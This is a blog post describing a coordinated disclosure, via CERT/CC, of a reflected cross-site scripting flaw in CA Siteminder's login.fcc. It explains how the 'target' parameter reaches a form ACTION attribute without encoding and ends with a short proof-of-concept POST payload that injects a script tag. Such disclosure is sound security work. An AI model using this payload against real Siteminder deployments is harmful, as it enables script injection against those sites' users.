Siteminder XSS In login.fcc

US-CERT and CERT/CC released VU#713012 today regarding a reflected cross-site scripting issue via attribute escaping. Below is a rehash of the notes we sent to CERT/CC. This was our first time coordinating a disclosure with CERT/CC. Overall, it was a great experience, considering we’ve had not the greatest experience disclosing directly to vendors. They were helpful during the whole process. If this was eBay, I’d give them A+++++++ feedback and would do business with them again :-)

<rehash>

How does the application work currently?
=========================================
CA Siteminder has a feature to be as seamless as possible when handling expired requests. If a user issued a request with an expired Siteminder session, Siteminder will store the request and re-authenticate the user. If the request was an HTTP POST, Siteminder will store the POST parameters, encrypt & Base64 the results. It will then send this value in subsequent response.

<HTML>
<HEAD>
<TITLE>
</TITLE>
</HEAD>
<BODY onLoad="document.AUTOSUBMIT.submit();">This page is used to hold your data while you are being authorized for your request.<BR><BR>
You will be forwarded to continue the authorization process. If this does not happen automatically, please click the Continue button below.
<FORM NAME="AUTOSUBMIT" METHOD="POST" ENCTYPE="application/x-www-form-urlencoded" ACTION="[[Siteminder Reauth link]]">
<INPUT TYPE="HIDDEN" NAME="SMPostPreserve" VALUE="[[Base64(glob)]]">
<INPUT TYPE="SUBMIT" VALUE="Continue">
</FORM>
</BODY>
</HTML>

When the user re-authenticates, the SMPostPreserve eventually is sent to POST to the default Siteminder login.fcc page as the postpreservationdata parameter.

[some response]

<form id="LoginForm" name="LoginForm" action="/path/to/login.fcc" method="post" onsubmit="return jsDisableAndSubmit();" autocomplete="off">
<input type="hidden" id="target" name="target" value="$SM$/path/to/some.jsp" />
<input type="hidden" id="smauthreason" name="smauthreason" value="0" />
<input type="hidden" id="smagentname" name="smagentname" value="somevalue" />
<input type="hidden" id="templatedir" name="templatedir" value="/path/to/templates" />
<input type="hidden" id="postpreservationdata" name="postpreservationdata" value="[[Same Base64(glob)]]"

This fulfills the initial request.

How can the application be exploited?
=====================================
If Siteminder sees that the postpreservationdata parameter is set, it will attempt to decode it. If it cannot decode it, it will respond with an autoload form below.


<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY onLoad="document.AUTOSUBMIT.submit();">
This page is used to hold your data while you are being authorized for your request.<BR><BR>
You will be forwarded to continue the authorization process. If this does not happen automatically, please click the Continue button below.
<FORM NAME="AUTOSUBMIT" METHOD="POST" ENCTYPE="application/x-www-form-urlencoded" ACTION="[[user supplied data here]]">
<$$smpostdata$$><INPUT TYPE="SUBMIT" VALUE="Continue">
</FORM>
</BODY>
</HTML>

If postpreservationdata is set to some invalid value such as “fail”, Siteminder will take the contents of the “target” POST parameter and pass it into ACTION, expanding any magic Siteminder variables like $SM$. This parameter may contain characters such as double-quote, which are not validated nor encoded correctly. This allows a malicious user to escape from the HTML attribute context and include additional HTML character, allowing for a reflected cross-site scripting attack.

How do you reproduce the issue?
===============================

Send a POST to the Siteminder login.fcc form with

postpreservationdata=fail&target="><script>alert(1)</script><"

Some implementations require that target begin with a valid URL or other parameters set, such as USER.
</rehash>